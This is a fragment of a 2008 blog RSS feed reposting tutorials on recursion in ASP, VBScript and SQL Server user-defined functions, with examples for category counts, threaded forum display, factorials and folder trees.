<br />Posted in SAPTCHA, Web  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/96/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/96/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/96/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=96&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2009/02/04/captcha-and-proposed-alternative-saptcha/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>Recursive SQL User Defined Functions</title>
		<link>http://samashok.wordpress.com/2008/08/13/recursive-sql-user-defined-functions/</link>
		<comments>http://samashok.wordpress.com/2008/08/13/recursive-sql-user-defined-functions/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 08:29:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[ASP]]></category>
		<category><![CDATA[Recursive SQL Functions]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/08/13/recursive-sql-user-defined-functions/</guid>
		<description><![CDATA[In this article we will cover the new feature of SQL Server 2000 and the ability to create user defined functions. We will focus on creating recursive queries in this article to extend upon previous articles. Being the developer for this directory, I had a need to perform several recursive methods. Any time you are [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=95&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>In this article we will  cover the new feature of SQL Server 2000 and the ability to create user defined  functions. We will focus on creating recursive queries in this article to  extend upon previous articles.<br />  Being the developer for this directory, I had a need to perform  several recursive methods. Any time you are creating a tree like <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/1857/parentid/191/Default.aspx" target="_new">data</a> structure like directories, org charts, etc. You will need to perform some kind  of recursion. In this example, I wanted to be able to provide a count of all  descendents sites under a particular category as you see on WWWCoder.com when  navigating the site. Each category contains a count of descendent sites of all  categories under that specific category.<br />  In the past there were several ways to perform this, one simple  method was to create a field in the categories table that would get incremented  each time a site was added. This was accomplished using a recursive method in  the ASP.Net code that would create a new connection to the <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/1857/parentid/191/Default.aspx" target="_new">database</a> each time a new record was added. It did eliminate the need to call a recursive  function for each time a person requested a page to display the category  navigation. Basically the method performed would accept a category id and a  string value to increment or decrement the count contained in the site count  field:</p>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </pre>
<pre>Public Sub UpdateParentCount(ByVal ParentID As Integer, ByVal AddSubtract As String)</pre>
<pre> Dim SQLQ As String = &quot;UPDATE Categories Set SiteCount = SiteCount &quot; &amp; AddSubtract &amp; &quot; 1&quot;</pre>
<pre> If AddSubtract = &quot;+&quot; Then 'add a new icon.</pre>
<pre>&nbsp; SQLQ = SQLQ &amp; &quot;, DateSiteAdded = '&quot; &amp; Date.Today &amp; &quot;'&quot;</pre>
<pre> End If</pre>
<pre> SQLQ = SQLQ &amp; &quot; WHERE CategoryID=&quot; &amp; ParentID</pre>
<pre> Dim secondConnection As New SqlConnection(GetDBConnectionString)</pre>
<pre> Dim secondCommand As New SqlCommand(SQLQ, secondConnection)</pre>
<pre> secondCommand.CommandType = CommandType.Text</pre>
<pre> secondConnection.Open()</pre>
<pre> secondCommand.ExecuteNonQuery()</pre>
<pre> secondConnection.Close()</pre>
<pre> secondConnection = Nothing</pre>
<pre> Dim SQLQ2 As String = &quot;SELECT ParentID FROM Categories Where CategoryID = &quot; &amp; ParentID</pre>
<pre> Dim myConnection As New SqlConnection(GetDBConnectionString)</pre>
<pre> Dim myCommand As New SqlCommand(SQLQ2, myConnection)</pre>
<pre> myConnection.Open()</pre>
<pre> Dim result As SqlDataReader = myCommand.ExecuteReader(CommandBehavior.CloseConnection)</pre>
<pre> If result.Read Then</pre>
<pre>&nbsp; UpdateParentCount(result(&quot;ParentID&quot;), AddSubtract)</pre>
<pre> End If</pre>
<pre> myConnection.Close()</pre>
<pre> myConnection = Nothing</pre>
<pre>End Sub </pre>
<pre>&nbsp;</pre>
<pre>&nbsp;</pre>
<p>This wasn&#8217;t too bad of solution, since I was able to eliminate  the hits on the database for the count. The problem here is a count can become  incorrect if any changes are performed outside of the application.<br />  The solution for me had to meet the following requirements:  reduce traffic between the Web <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/1857/parentid/191/Default.aspx" target="_new">server</a> and the database server, and make sure an accurate count is always available in  the database regardless of what modifies the records that it contains. In order  to accomplish this, the count method was moved out of the ASP.Net code and into  the database. SQL Server 2000 <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/1857/parentid/191/Default.aspx" target="_new">supports</a> User Defined Functions that can be called from a stored procedure, in addition,  the function can be recursive up to 32 levels. Since I can&#8217;t see a need to go  beyond 32 levels deep of categories, I opted to use the functions for creating  the count. Here is an example of using a function from within a stored  procedure:</p>
<pre>ALTER procedure GetCategories</pre>
<pre>&nbsp;</pre>
<pre>@ParentID&nbsp;&nbsp; int</pre>
<pre>&nbsp;</pre>
<pre>as</pre>
<pre>&nbsp;</pre>
<pre>BEGIN</pre>
<pre>SELECT </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;CategoryID, CategoryName, Path, SiteCount, DateSiteAdded, </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;ParentID, SortColumn, dbo.CountChildren(CategoryID, 0) </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;As CulCount</pre>
<pre>FROM </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;Categories&nbsp; </pre>
<pre>WHERE </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;ParentID = @ParentID</pre>
<pre>ORDER BY </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;SortColumn, CategoryName</pre>
<pre>END </pre>
<pre>&nbsp;</pre>
<p>You&#8217;ll  notice in the SQL stored procedure&#8217;s select statement there is a call to a  function called CountChildren, in this function we pass the category id of the  current category and the current cumulative count of the sites within the  category. </p>
<pre>ALTER FUNCTION dbo.CountChildren</pre>
<pre>(@id int, @cChildren int) </pre>
<pre>RETURNS bigint </pre>
<pre>AS</pre>
<pre>BEGIN</pre>
<pre>&nbsp;</pre>
<pre>IF EXISTS (SELECT&nbsp;&nbsp;&nbsp;&nbsp; </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;Sites.SiteCatID</pre>
<pre>FROM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;dbo.Categories </pre>
<pre>INNER JOIN</pre>
<pre>&nbsp;&nbsp;&nbsp; dbo.Sites </pre>
<pre>ON </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;dbo.Categories.CategoryID = dbo.Sites.SiteCatID</pre>
<pre>WHERE </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;dbo.Categories.ParentID = @id OR dbo.Sites.SiteCatID = @id)</pre>
<pre>BEGIN </pre>
<pre>&nbsp;&nbsp;&nbsp;SET @cChildren = @cChildren + (</pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp; SELECT </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Count(SiteCatID) </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FROM </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sites </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WHERE </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SiteCatID = @id AND SiteActive = 1)</pre>
<pre>&nbsp; SELECT </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@cChildren = dbo.CountChildren(CategoryID, @cChildren) </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FROM </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Categories </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WHERE </pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ParentID = @id </pre>
<pre>END </pre>
<pre>&nbsp;&nbsp;RETURN @cChildren </pre>
<pre>END  </pre>
<pre>&nbsp;</pre>
<pre>&nbsp;</pre>
<p>As you can see the function calls itself just as a recursive  function in VB.Net would do, each time incrementing the cumulative count of all  descendents of a particular category. In the end we have all the information  generated on the SQL machine, and then it returns what we need without having  to call a recursive method in the ASP.Net page and generate all the additional  database calls over the <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/1857/parentid/191/Default.aspx" target="_new">network</a>.<br />  By: Patrick Santry, Microsoft MVP (ASP/ASP.NET), developer of  this site, author of books on Web technologies, and member of the DotNetNuke  core development team. If you&#8217;re interested in the services provided by  Patrick, visit his company Website at <a href="http://www.santry.com" target="_new">Santry.com</a>.</p>
<p>Source: <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/1857/parentid/191/Default.aspx" target="_new">http://www.wwwcoder.com/</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/95/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/95/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/95/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/95/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/95/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=95&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/08/13/recursive-sql-user-defined-functions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>Recursive Sub-Procedures in ASP</title>
		<link>http://samashok.wordpress.com/2008/08/13/recursive-sub-procedures-in-asp/</link>
		<comments>http://samashok.wordpress.com/2008/08/13/recursive-sub-procedures-in-asp/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 08:24:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[ASP]]></category>
		<category><![CDATA[Recursive Functions]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/08/13/recursive-sub-procedures-in-asp/</guid>
		<description><![CDATA[This tutorial explains how to do recursive subroutines in ASP (VBScript). Use this algorithm to create threaded discussions, directories, or whatever use you have for it. One of the best algorithms to know as a Web developer is how to code recursive sub procedures. What&#8217;s recursion, and how does it help you as an ASP [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=94&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This tutorial explains how  to do recursive subroutines in ASP (VBScript). Use this algorithm to create  threaded discussions, directories, or whatever use you have for it.</p>
<p>One of the best algorithms to know as a Web <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/899/parentid/154/Default.aspx" target="_new">developer</a> is how to code recursive sub  procedures. What&#8217;s recursion, and how does it help you as an ASP developer?  Recursion allows you to code parent-child relationships. Parent-child  relationships are the essence of directory tree-like structures. Trees allow  you to develop threaded discussions, directory <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/899/parentid/154/Default.aspx" target="_new">search engines</a> (like santry.com), and  perform lookups through your directories.</p>
<p>This process is done by calling a subroutine unto itself. What  happens is the subroutine is initially called and then the subroutine calls  itself until an end or condition is reached. Say for instance your doing a  directory listing to list the contents of a directory, then each time the procedure  encounters a new directory it calls itself to list the contents of the  subdirectory, then the subroutine calls itself again to list the contents of  directories in this sub directory and so on.</p>
<p>  You can create this parent-child  relationship in a database table.&nbsp;For example, the following table  structure in a <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/899/parentid/154/Default.aspx" target="_new">database</a>:</p>
<p align="center">&nbsp;</p>
<table width="314" border="1" align="center" cellpadding="0" cellspacing="5">
<tr>
<td width="97" align="left">
<p align="center"><strong>RecordID<br />                (autonumber)</strong>      </p>
</td>
<td width="83" align="left">
<p><strong>ParentID</strong>      </p>
</td>
<td width="116" align="left">
<p><strong>DisplayName</strong>      </p>
</td>
</tr>
<tr>
<td width="97">
<p align="center">        1      </p>
</td>
<td width="83">
<p>0      </p>
</td>
<td width="116">
<p>Topic 1      </p>
</td>
</tr>
<tr>
<td width="97">
<p align="center">        2      </p>
</td>
<td width="83">
<p>0      </p>
</td>
<td width="116">
<p>Topic 2      </p>
</td>
</tr>
<tr>
<td width="97">
<p align="center">        3      </p>
</td>
<td width="83">
<p>1      </p>
</td>
<td width="116">
<p>RE: Topic 1      </p>
</td>
</tr>
<tr>
<td width="97">
<p align="center">        4      </p>
</td>
<td width="83">
<p>1      </p>
</td>
<td width="116">
<p>RE: Topic 1      </p>
</td>
</tr>
<tr>
<td width="97">
<p align="center">        5      </p>
</td>
<td width="83">
<p>2      </p>
</td>
<td width="116">
<p>RE: RE: Topic 1      </p>
</td>
</tr>
<tr>
<td width="97">
<p align="center">        6      </p>
</td>
<td width="83">
<p>2      </p>
</td>
<td width="116">
<p>RE: RE: Topic 1</p>
</td>
</tr>
</table>
<p>  You can see from the above table that we have several records,  some of the records have a 0 as a ParentID, meaning this is a top level parent  record, then other records do have a value other than 0 in the ParentID,  meaning they are children of the record that has a matching ID in the table.  This structure is very versatile, in that you can have unlimited child records  using this structure, thus allowing you to create as many nests or branches you  wish. You should now see why this algorithm is very useful when it comes to the  Web. This structure drives those threaded forums, directories and all the cool  apps that you want to be able to create. </p>
<p>  The next piece of code shows how to make the SQL call and then  call the subroutine in order to display this structure to the user.<br />  Set DBConn =  Server.CreateObject(&quot;ADODB.Connection&quot;)<br />  DBConn.Open &quot;DSN=MyDSN&quot; <br />  &#8216;here we initially call the sub routine, we pass 0 as the parent  ID <br />  &#8216;this will pull all top level parent (meaning they don&#8217;t have an  &#8216;ancestor). <br />  &#8216;we also pass 0 for the level, this is used for spacing, or<br />  &#8216;making the results appear threaded. <br />  DoTree(0,0)<br />  &#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- <br />  Sub DoTree(ParentID, intLevel) <br />  Dim SQLQ, DBConn, rs, i <br />  SQLQ = &quot;SELECT RecordID, DisplayName FROM RECORDS &quot;  &amp; _ <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;WHERE ParentID = &quot;  &amp; ParentID <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set rs =  DBConn.Execute(SQLQ) <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If Not rs.EOF Then <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Do  Until rs.EOF <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Response.Write &quot;&lt;img src=Spacer.gif Width= &quot; &amp; _<br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  15 * intLevel &amp; &quot;&gt;&quot; <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Response.Write rs(&quot;DisplayName&quot;) &amp; &quot;&lt;br&gt;&quot; <br />  &#8216;now call the subroutine we&#8217;re in to see if this value has <br />  &#8216;any children and increase the indent, and so on&#8230;&nbsp; &nbsp;&nbsp; <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  DoTree&nbsp;rs(&quot;RecordID&quot;), intLevel + 1&nbsp;<br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;rs.MoveNext <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Loop <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; End If <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; rs.Close <br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set rs = Nothing&nbsp;<br />  End Sub <br />  &#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br />  DBConn.Close <br />  Set DBConn= Nothing <br />  &#8216;Once this routine is execute you should see results similiar to  this: <br />  Topic 1<br />  &nbsp;&nbsp;&nbsp; RE: Topic 1<br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RE: RE: Topic 1<br />  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RE: RE: Topic 1<br />  &nbsp;&nbsp;&nbsp; RE: Topic 1<br />  Topic 2 </p>
<p>So you can see from this example how you can use this to create a  threaded type forum. You&#8217;ll need to play around with the preceeding code a bit  and find out how you can put it to use in your <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/899/parentid/154/Default.aspx" target="_new">application</a>. </p>
<p>Source: <a href="http://www.wwwcoder.com/Directory/tabid/68/type/art/site/899/parentid/154/Default.aspx" target="_new">http://www.wwwcoder.com/</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/94/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/94/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/94/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=94&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/08/13/recursive-sub-procedures-in-asp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>Recursive Functions in ASP</title>
		<link>http://samashok.wordpress.com/2008/08/13/recursive-functions-in-asp/</link>
		<comments>http://samashok.wordpress.com/2008/08/13/recursive-functions-in-asp/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 08:14:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[ASP]]></category>
		<category><![CDATA[Recursive Functions]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/08/13/recursive-functions-in-asp/</guid>
		<description><![CDATA[A function that calls itself repeatedly, satisfying some condition is called a Recursive Function. Using recursion, we split a complex problem into its single simplest case. The recursive function only knows how to solve that simplest case. You&#8217;ll see the difference between solving a problem iteratively and recursively later. Warning! Beware! Use the recursion technique [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=93&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>A function that calls itself repeatedly, satisfying some condition is called   a Recursive Function. Using recursion, we split a complex problem into its   single simplest case. The recursive function only knows how to solve that   simplest case. You&#8217;ll see the difference between solving a problem iteratively   and recursively later. </p>
<h2><strong>Warning!</strong> </h2>
<p>Beware! Use the recursion technique carefully, if you fail to handle it   appropriately you can end up with a never-ending ASP application. </p>
<h2><strong>Same Old Factorial problem</strong> </h2>
<p>Almost for every language, the beginners learning the concept of recursion   are presented with the same old Factorial problem. I&#8217;ll follow the traditional   path, because I feel that it&#8217;s the easiest way to understand the basic concept   of recursion. </p>
<h2><strong>Understanding the problem</strong> </h2>
<p>In mathematics, the factorial of a positive integer n, written as n! is   represented by the following formula: </p>
<p>n! = n . (n-1) . (n-2) . (n-3) . Š. . 1 </p>
<p>In plain english, factorial of a number is the product of that number with a   number 1 less than that number, this multiplication process continues until the   number which is being multiplied, eventually becomes equal to 1. </p>
<h2><strong>Iterative Solution</strong> </h2>
<p>In the following function the value of 5! is calculated iteratively: </p>
</p>
<blockquote><pre>&lt;%  Response.Write iterativeFactorial (5)    

Function iterativeFactorial ( intNumber )

 Dim intCount, intFactorial  

 intFactorial = 1   For intCount = intNumber To 1 Step -1

  intFactorial = intFactorial * intCount   Next     iterativeFactorial = intFactorial  End Function%&gt;</pre>
</blockquote>
<p><strong>Recursive Solution</strong> </p>
<p>The following function represents the recursive solution for the factorial   problem. </p>
</p>
<blockquote><pre>&lt;%    Response.Write recursiveFactorial (5)      Function recursiveFactorial ( intNumber )   If intNumber &lt;= 1 Then    recursiveFactorial = 1  Else   recursiveFactorial = intNumber * recursiveFactorial ( intNumber - 1 )   End If    End Function  %&gt;</pre>
</blockquote>
<p>The working of the above function recursiveFactorial is simple. If the   integer argument &#8220;intNumber&#8221; is less than or equal to one, then the function   returns 1, else the return value of the function is the product of intNumber   with the value returned by the same function for integer argument &#8220;intNumber-1&#8243;. </p>
<p>Answer of the above problem: </p>
<p>5! = 5 . (5-1) . (5-2) . (5-3) . (5-4) </p>
<p>Simplifying: </p>
<p>5! = 5 . 4 . 3 . 2. 1 = 120 </p>
<p><strong>Example: Folder Tree</strong> </p>
<p>The following example will display the tree structure for a specified folder. </p>
</p>
<blockquote><pre>

&lt;%  ' Displays the Tree structure, replaces vbTab character with 3 HTML  spaces

  Response.Write Replace (DisplayFolderTree (&quot;c:\windows&quot;, 0), vbTab,  &quot;&nbsp;&nbsp;&nbsp;&quot;)

  Function DisplayFolderTree ( strFolder, intTreeLevel )

   Dim objFileSystem, objFolder, objSubFolders, objTempFolder     Set objFileSystem = CreateObject(&quot;Scripting.FileSystemObject&quot;)  

   ' Get the name of current folder   Set objFolder = objFileSystem.GetFolder ( strFolder )  

   ' Get the list of subfolders   Set objSubFolders = objFolder.SubFolders  

   ' Adds the name of current folder with proper indentation   ' intTreeLevel is used only for indenting folder name  according to its pos ition   DisplayFolderTree = DisplayFolderTree &amp; String ( intTreeLevel,  vbTab) &amp; &quot;&bull;&quot;   DisplayFolderTree = DisplayFolderTree &amp; vbTab &amp; objFolder.Name &amp;  &quot;&lt;br&gt;&quot;

   ' Recursion takes place here   ' If any &quot;subfolders exist&quot;, the function is repeated for  them too!   If objSubFolders.Count &gt; 0 Then    For Each objTempFolder in objSubFolders     strArgument = strFolder &amp; &quot;\&quot; &amp; objTempFolder.Name     DisplayFolderTree = DisplayFolderTree &amp;  DisplayFolderTree ( strArgument, intTreeLevel+1 )    Next    End If  

   ' When the control reaches HERE! This means your function has  ended   ' Now no more recursive calls to the function will take place

  End Function  %&gt;    

  </pre>
</blockquote>
<p><strong>Conclusion</strong> </p>
<p>The recursive functions solve the problem in a method much identical to their   real-life solutions. In the example above, we simply display the name of current   folder. Then we obtain a list of subfolders and repeat the function for each of   them. </p>
<p>While using iterative functions we know about the number of iterations, ie.   how many times a loop will be executed, in advance. </p>
<p>In the factorial problem, recursion is not necessary because we know that a   loop will be executed until the value of the number becomes 1. But, in Folder   Tree example, we never know how many subfolders may be present in a folder and   how many iterations will be required. For this purpose, the most suitable   solution is to call the function recursively to display information about a   folder and its subfolders. </p>
<p>Source: <a href="http://www.15seconds.com/issue/000803.htm" target="_new">http://www.15seconds.com/</a></p>
